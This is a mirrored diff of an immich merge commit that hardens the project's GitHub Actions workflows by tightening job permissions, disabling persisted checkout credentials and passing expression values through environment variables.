mirror of
https://github.com/immich-app/immich.git
synced 2025-07-09 03:04:16 -04:00
Merge branch 'main' into feat/sqlite-device-assets
# Conflicts: # mobile/lib/domain/utils/background_sync.dart
This commit is contained in:
commit
5fc1a63810
29
.github/workflows/build-mobile.yml
vendored
29
.github/workflows/build-mobile.yml
vendored
@ -7,6 +7,15 @@ on:
|
|||||||
ref:
|
ref:
|
||||||
required: false
|
required: false
|
||||||
type: string
|
type: string
|
||||||
|
secrets:
|
||||||
|
KEY_JKS:
|
||||||
|
required: true
|
||||||
|
ALIAS:
|
||||||
|
required: true
|
||||||
|
ANDROID_KEY_PASSWORD:
|
||||||
|
required: true
|
||||||
|
ANDROID_STORE_PASSWORD:
|
||||||
|
required: true
|
||||||
pull_request:
|
pull_request:
|
||||||
push:
|
push:
|
||||||
branches: [main]
|
branches: [main]
|
||||||
@ -15,14 +24,21 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run: ${{ steps.found_paths.outputs.mobile == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -38,22 +54,17 @@ jobs:
|
|||||||
build-sign-android:
|
build-sign-android:
|
||||||
name: Build and sign Android
|
name: Build and sign Android
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
# Skip when PR from a fork
|
# Skip when PR from a fork
|
||||||
if: ${{ !github.event.pull_request.head.repo.fork && github.actor != 'dependabot[bot]' && needs.pre-job.outputs.should_run == 'true' }}
|
if: ${{ !github.event.pull_request.head.repo.fork && github.actor != 'dependabot[bot]' && needs.pre-job.outputs.should_run == 'true' }}
|
||||||
runs-on: macos-14
|
runs-on: macos-14
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Determine ref
|
|
||||||
id: get-ref
|
|
||||||
run: |
|
|
||||||
input_ref="${{ inputs.ref }}"
|
|
||||||
github_ref="${{ github.sha }}"
|
|
||||||
ref="${input_ref:-$github_ref}"
|
|
||||||
echo "ref=$ref" >> $GITHUB_OUTPUT
|
|
||||||
|
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
ref: ${{ steps.get-ref.outputs.ref }}
|
ref: ${{ inputs.ref || github.sha }}
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- uses: actions/setup-java@c5195efecf7bdfc987ee8bae7a71cb8b11521c00 # v4
|
- uses: actions/setup-java@c5195efecf7bdfc987ee8bae7a71cb8b11521c00 # v4
|
||||||
with:
|
with:
|
||||||
|
17
.github/workflows/cache-cleanup.yml
vendored
17
.github/workflows/cache-cleanup.yml
vendored
@ -8,31 +8,38 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
cleanup:
|
cleanup:
|
||||||
name: Cleanup
|
name: Cleanup
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
actions: write
|
||||||
steps:
|
steps:
|
||||||
- name: Check out code
|
- name: Check out code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Cleanup
|
- name: Cleanup
|
||||||
|
env:
|
||||||
|
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
REF: ${{ github.ref }}
|
||||||
run: |
|
run: |
|
||||||
gh extension install actions/gh-actions-cache
|
gh extension install actions/gh-actions-cache
|
||||||
|
|
||||||
REPO=${{ github.repository }}
|
REPO=${{ github.repository }}
|
||||||
BRANCH=${{ github.ref }}
|
|
||||||
|
|
||||||
echo "Fetching list of cache keys"
|
echo "Fetching list of cache keys"
|
||||||
cacheKeysForPR=$(gh actions-cache list -R $REPO -B $BRANCH -L 100 | cut -f 1 )
|
cacheKeysForPR=$(gh actions-cache list -R $REPO -B ${REF} -L 100 | cut -f 1 )
|
||||||
|
|
||||||
## Setting this to not fail the workflow while deleting cache keys.
|
## Setting this to not fail the workflow while deleting cache keys.
|
||||||
set +e
|
set +e
|
||||||
echo "Deleting caches..."
|
echo "Deleting caches..."
|
||||||
for cacheKey in $cacheKeysForPR
|
for cacheKey in $cacheKeysForPR
|
||||||
do
|
do
|
||||||
gh actions-cache delete $cacheKey -R $REPO -B $BRANCH --confirm
|
gh actions-cache delete $cacheKey -R "$REPO" -B "${REF}" --confirm
|
||||||
done
|
done
|
||||||
echo "Done"
|
echo "Done"
|
||||||
env:
|
|
||||||
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
||||||
|
13
.github/workflows/cli.yml
vendored
13
.github/workflows/cli.yml
vendored
@ -16,19 +16,23 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
permissions:
|
permissions: {}
|
||||||
packages: write
|
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
publish:
|
publish:
|
||||||
name: CLI Publish
|
name: CLI Publish
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./cli
|
working-directory: ./cli
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
# Setup .npmrc file to publish to npm
|
# Setup .npmrc file to publish to npm
|
||||||
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
with:
|
with:
|
||||||
@ -48,11 +52,16 @@ jobs:
|
|||||||
docker:
|
docker:
|
||||||
name: Docker
|
name: Docker
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
packages: write
|
||||||
needs: publish
|
needs: publish
|
||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout
|
- name: Checkout
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Set up QEMU
|
- name: Set up QEMU
|
||||||
uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
|
uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
|
||||||
|
4
.github/workflows/codeql-analysis.yml
vendored
4
.github/workflows/codeql-analysis.yml
vendored
@ -24,6 +24,8 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
analyze:
|
analyze:
|
||||||
name: Analyze
|
name: Analyze
|
||||||
@ -43,6 +45,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
# Initializes the CodeQL tools for scanning.
|
# Initializes the CodeQL tools for scanning.
|
||||||
- name: Initialize CodeQL
|
- name: Initialize CodeQL
|
||||||
|
85
.github/workflows/docker.yml
vendored
85
.github/workflows/docker.yml
vendored
@ -12,18 +12,21 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
permissions:
|
permissions: {}
|
||||||
packages: write
|
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_server: ${{ steps.found_paths.outputs.server == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
should_run_ml: ${{ steps.found_paths.outputs.machine-learning == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run_ml: ${{ steps.found_paths.outputs.machine-learning == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -45,6 +48,9 @@ jobs:
|
|||||||
retag_ml:
|
retag_ml:
|
||||||
name: Re-Tag ML
|
name: Re-Tag ML
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
packages: write
|
||||||
if: ${{ needs.pre-job.outputs.should_run_ml == 'false' && !github.event.pull_request.head.repo.fork }}
|
if: ${{ needs.pre-job.outputs.should_run_ml == 'false' && !github.event.pull_request.head.repo.fork }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
strategy:
|
strategy:
|
||||||
@ -58,18 +64,22 @@ jobs:
|
|||||||
username: ${{ github.repository_owner }}
|
username: ${{ github.repository_owner }}
|
||||||
password: ${{ secrets.GITHUB_TOKEN }}
|
password: ${{ secrets.GITHUB_TOKEN }}
|
||||||
- name: Re-tag image
|
- name: Re-tag image
|
||||||
|
env:
|
||||||
|
REGISTRY_NAME: 'ghcr.io'
|
||||||
|
REPOSITORY: ${{ github.repository_owner }}/immich-machine-learning
|
||||||
|
TAG_OLD: main${{ matrix.suffix }}
|
||||||
|
TAG_PR: ${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
|
||||||
|
TAG_COMMIT: commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
|
||||||
run: |
|
run: |
|
||||||
REGISTRY_NAME="ghcr.io"
|
docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_PR}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
|
||||||
REPOSITORY=${{ github.repository_owner }}/immich-machine-learning
|
docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_COMMIT}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
|
||||||
TAG_OLD=main${{ matrix.suffix }}
|
|
||||||
TAG_PR=${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
|
|
||||||
TAG_COMMIT=commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
|
|
||||||
docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_PR $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
|
|
||||||
docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_COMMIT $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
|
|
||||||
|
|
||||||
retag_server:
|
retag_server:
|
||||||
name: Re-Tag Server
|
name: Re-Tag Server
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
packages: write
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'false' && !github.event.pull_request.head.repo.fork }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'false' && !github.event.pull_request.head.repo.fork }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
strategy:
|
strategy:
|
||||||
@ -83,18 +93,22 @@ jobs:
|
|||||||
username: ${{ github.repository_owner }}
|
username: ${{ github.repository_owner }}
|
||||||
password: ${{ secrets.GITHUB_TOKEN }}
|
password: ${{ secrets.GITHUB_TOKEN }}
|
||||||
- name: Re-tag image
|
- name: Re-tag image
|
||||||
|
env:
|
||||||
|
REGISTRY_NAME: 'ghcr.io'
|
||||||
|
REPOSITORY: ${{ github.repository_owner }}/immich-server
|
||||||
|
TAG_OLD: main${{ matrix.suffix }}
|
||||||
|
TAG_PR: ${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
|
||||||
|
TAG_COMMIT: commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
|
||||||
run: |
|
run: |
|
||||||
REGISTRY_NAME="ghcr.io"
|
docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_PR}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
|
||||||
REPOSITORY=${{ github.repository_owner }}/immich-server
|
docker buildx imagetools create -t "${REGISTRY_NAME}/${REPOSITORY}:${TAG_COMMIT}" "${REGISTRY_NAME}/${REPOSITORY}:${TAG_OLD}"
|
||||||
TAG_OLD=main${{ matrix.suffix }}
|
|
||||||
TAG_PR=${{ github.event.number == 0 && github.ref_name || format('pr-{0}', github.event.number) }}${{ matrix.suffix }}
|
|
||||||
TAG_COMMIT=commit-${{ github.event_name != 'pull_request' && github.sha || github.event.pull_request.head.sha }}${{ matrix.suffix }}
|
|
||||||
docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_PR $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
|
|
||||||
docker buildx imagetools create -t $REGISTRY_NAME/$REPOSITORY:$TAG_COMMIT $REGISTRY_NAME/$REPOSITORY:$TAG_OLD
|
|
||||||
|
|
||||||
build_and_push_ml:
|
build_and_push_ml:
|
||||||
name: Build and Push ML
|
name: Build and Push ML
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
packages: write
|
||||||
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
||||||
runs-on: ${{ matrix.runner }}
|
runs-on: ${{ matrix.runner }}
|
||||||
env:
|
env:
|
||||||
@ -148,6 +162,8 @@ jobs:
|
|||||||
|
|
||||||
- name: Checkout
|
- name: Checkout
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Set up Docker Buildx
|
- name: Set up Docker Buildx
|
||||||
uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3.10.0
|
uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3.10.0
|
||||||
@ -161,11 +177,14 @@ jobs:
|
|||||||
password: ${{ secrets.GITHUB_TOKEN }}
|
password: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
|
||||||
- name: Generate cache key suffix
|
- name: Generate cache key suffix
|
||||||
|
env:
|
||||||
|
REF: ${{ github.ref_name }}
|
||||||
run: |
|
run: |
|
||||||
if [[ "${{ github.event_name }}" == "pull_request" ]]; then
|
if [[ "${{ github.event_name }}" == "pull_request" ]]; then
|
||||||
echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
|
echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
|
||||||
else
|
else
|
||||||
echo "CACHE_KEY_SUFFIX=$(echo ${{ github.ref_name }} | sed 's/[^a-zA-Z0-9]/-/g')" >> $GITHUB_ENV
|
SUFFIX=$(echo "${REF}" | sed 's/[^a-zA-Z0-9]/-/g')
|
||||||
|
echo "CACHE_KEY_SUFFIX=${SUFFIX}" >> $GITHUB_ENV
|
||||||
fi
|
fi
|
||||||
|
|
||||||
- name: Generate cache target
|
- name: Generate cache target
|
||||||
@ -175,7 +194,7 @@ jobs:
|
|||||||
# Essentially just ignore the cache output (forks can't write to registry cache)
|
# Essentially just ignore the cache output (forks can't write to registry cache)
|
||||||
echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
|
echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
|
||||||
else
|
else
|
||||||
echo "cache-to=type=registry,ref=${{ env.GHCR_REPO }}-build-cache:${{ env.PLATFORM_PAIR }}-${{ matrix.device }}-${{ env.CACHE_KEY_SUFFIX }},mode=max,compression=zstd" >> $GITHUB_OUTPUT
|
echo "cache-to=type=registry,ref=${GHCR_REPO}-build-cache:${PLATFORM_PAIR}-${{ matrix.device }}-${CACHE_KEY_SUFFIX},mode=max,compression=zstd" >> $GITHUB_OUTPUT
|
||||||
fi
|
fi
|
||||||
|
|
||||||
- name: Generate docker image tags
|
- name: Generate docker image tags
|
||||||
@ -221,6 +240,10 @@ jobs:
|
|||||||
merge_ml:
|
merge_ml:
|
||||||
name: Merge & Push ML
|
name: Merge & Push ML
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
actions: read
|
||||||
|
packages: write
|
||||||
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' && !github.event.pull_request.head.repo.fork }}
|
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' && !github.event.pull_request.head.repo.fork }}
|
||||||
env:
|
env:
|
||||||
GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-machine-learning
|
GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-machine-learning
|
||||||
@ -308,15 +331,16 @@ jobs:
|
|||||||
fi
|
fi
|
||||||
|
|
||||||
TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
|
TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
|
||||||
SOURCE_ARGS=$(printf '${{ env.GHCR_REPO }}@sha256:%s ' *)
|
SOURCE_ARGS=$(printf "${GHCR_REPO}@sha256:%s " *)
|
||||||
|
|
||||||
echo "docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS"
|
|
||||||
|
|
||||||
docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
|
docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
|
||||||
|
|
||||||
build_and_push_server:
|
build_and_push_server:
|
||||||
name: Build and Push Server
|
name: Build and Push Server
|
||||||
runs-on: ${{ matrix.runner }}
|
runs-on: ${{ matrix.runner }}
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
packages: write
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
||||||
env:
|
env:
|
||||||
@ -340,6 +364,8 @@ jobs:
|
|||||||
|
|
||||||
- name: Checkout
|
- name: Checkout
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Set up Docker Buildx
|
- name: Set up Docker Buildx
|
||||||
uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3
|
uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2 # v3
|
||||||
@ -353,11 +379,14 @@ jobs:
|
|||||||
password: ${{ secrets.GITHUB_TOKEN }}
|
password: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
|
||||||
- name: Generate cache key suffix
|
- name: Generate cache key suffix
|
||||||
|
env:
|
||||||
|
REF: ${{ github.ref_name }}
|
||||||
run: |
|
run: |
|
||||||
if [[ "${{ github.event_name }}" == "pull_request" ]]; then
|
if [[ "${{ github.event_name }}" == "pull_request" ]]; then
|
||||||
echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
|
echo "CACHE_KEY_SUFFIX=pr-${{ github.event.number }}" >> $GITHUB_ENV
|
||||||
else
|
else
|
||||||
echo "CACHE_KEY_SUFFIX=$(echo ${{ github.ref_name }} | sed 's/[^a-zA-Z0-9]/-/g')" >> $GITHUB_ENV
|
SUFFIX=$(echo "${REF}" | sed 's/[^a-zA-Z0-9]/-/g')
|
||||||
|
echo "CACHE_KEY_SUFFIX=${SUFFIX}" >> $GITHUB_ENV
|
||||||
fi
|
fi
|
||||||
|
|
||||||
- name: Generate cache target
|
- name: Generate cache target
|
||||||
@ -367,7 +396,7 @@ jobs:
|
|||||||
# Essentially just ignore the cache output (forks can't write to registry cache)
|
# Essentially just ignore the cache output (forks can't write to registry cache)
|
||||||
echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
|
echo "cache-to=type=local,dest=/tmp/discard,ignore-error=true" >> $GITHUB_OUTPUT
|
||||||
else
|
else
|
||||||
echo "cache-to=type=registry,ref=${{ env.GHCR_REPO }}-build-cache:${{ env.PLATFORM_PAIR }}-${{ env.CACHE_KEY_SUFFIX }},mode=max,compression=zstd" >> $GITHUB_OUTPUT
|
echo "cache-to=type=registry,ref=${GHCR_REPO}-build-cache:${PLATFORM_PAIR}-${CACHE_KEY_SUFFIX},mode=max,compression=zstd" >> $GITHUB_OUTPUT
|
||||||
fi
|
fi
|
||||||
|
|
||||||
- name: Generate docker image tags
|
- name: Generate docker image tags
|
||||||
@ -413,6 +442,10 @@ jobs:
|
|||||||
merge_server:
|
merge_server:
|
||||||
name: Merge & Push Server
|
name: Merge & Push Server
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
actions: read
|
||||||
|
packages: write
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' && !github.event.pull_request.head.repo.fork }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' && !github.event.pull_request.head.repo.fork }}
|
||||||
env:
|
env:
|
||||||
GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-server
|
GHCR_REPO: ghcr.io/${{ github.repository_owner }}/immich-server
|
||||||
@ -486,15 +519,14 @@ jobs:
|
|||||||
fi
|
fi
|
||||||
|
|
||||||
TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
|
TAGS=$(jq -cr '.tags | map("-t " + .) | join(" ")' <<< "$DOCKER_METADATA_OUTPUT_JSON") \
|
||||||
SOURCE_ARGS=$(printf '${{ env.GHCR_REPO }}@sha256:%s ' *)
|
SOURCE_ARGS=$(printf "${GHCR_REPO}@sha256:%s " *)
|
||||||
|
|
||||||
echo "docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS"
|
|
||||||
|
|
||||||
docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
|
docker buildx imagetools create $TAGS "${ANNOTATIONS[@]}" $SOURCE_ARGS
|
||||||
|
|
||||||
success-check-server:
|
success-check-server:
|
||||||
name: Docker Build & Push Server Success
|
name: Docker Build & Push Server Success
|
||||||
needs: [merge_server, retag_server]
|
needs: [merge_server, retag_server]
|
||||||
|
permissions: {}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: always()
|
if: always()
|
||||||
steps:
|
steps:
|
||||||
@ -508,6 +540,7 @@ jobs:
|
|||||||
success-check-ml:
|
success-check-ml:
|
||||||
name: Docker Build & Push ML Success
|
name: Docker Build & Push ML Success
|
||||||
needs: [merge_ml, retag_ml]
|
needs: [merge_ml, retag_ml]
|
||||||
|
permissions: {}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: always()
|
if: always()
|
||||||
steps:
|
steps:
|
||||||
|
10
.github/workflows/docs-build.yml
vendored
10
.github/workflows/docs-build.yml
vendored
@ -10,14 +10,20 @@ concurrency:
|
|||||||
group: ${{ github.workflow }}-${{ github.ref }}
|
group: ${{ github.workflow }}-${{ github.ref }}
|
||||||
cancel-in-progress: true
|
cancel-in-progress: true
|
||||||
|
|
||||||
|
permissions: {}
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
pre-job:
|
pre-job:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
outputs:
|
outputs:
|
||||||
should_run: ${{ steps.found_paths.outputs.docs == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
should_run: ${{ steps.found_paths.outputs.docs == 'true' || steps.should_force.outputs.should_force == 'true' }}
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -33,6 +39,8 @@ jobs:
|
|||||||
build:
|
build:
|
||||||
name: Docs Build
|
name: Docs Build
|
||||||
needs: pre-job
|
needs: pre-job
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
defaults:
|
defaults:
|
||||||
@ -42,6 +50,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
|
20
.github/workflows/docs-deploy.yml
vendored
20
.github/workflows/docs-deploy.yml
vendored
@ -9,6 +9,9 @@ jobs:
|
|||||||
checks:
|
checks:
|
||||||
name: Docs Deploy Checks
|
name: Docs Deploy Checks
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
actions: read
|
||||||
|
pull-requests: read
|
||||||
outputs:
|
outputs:
|
||||||
parameters: ${{ steps.parameters.outputs.result }}
|
parameters: ${{ steps.parameters.outputs.result }}
|
||||||
artifact: ${{ steps.get-artifact.outputs.result }}
|
artifact: ${{ steps.get-artifact.outputs.result }}
|
||||||
@ -36,6 +39,8 @@ jobs:
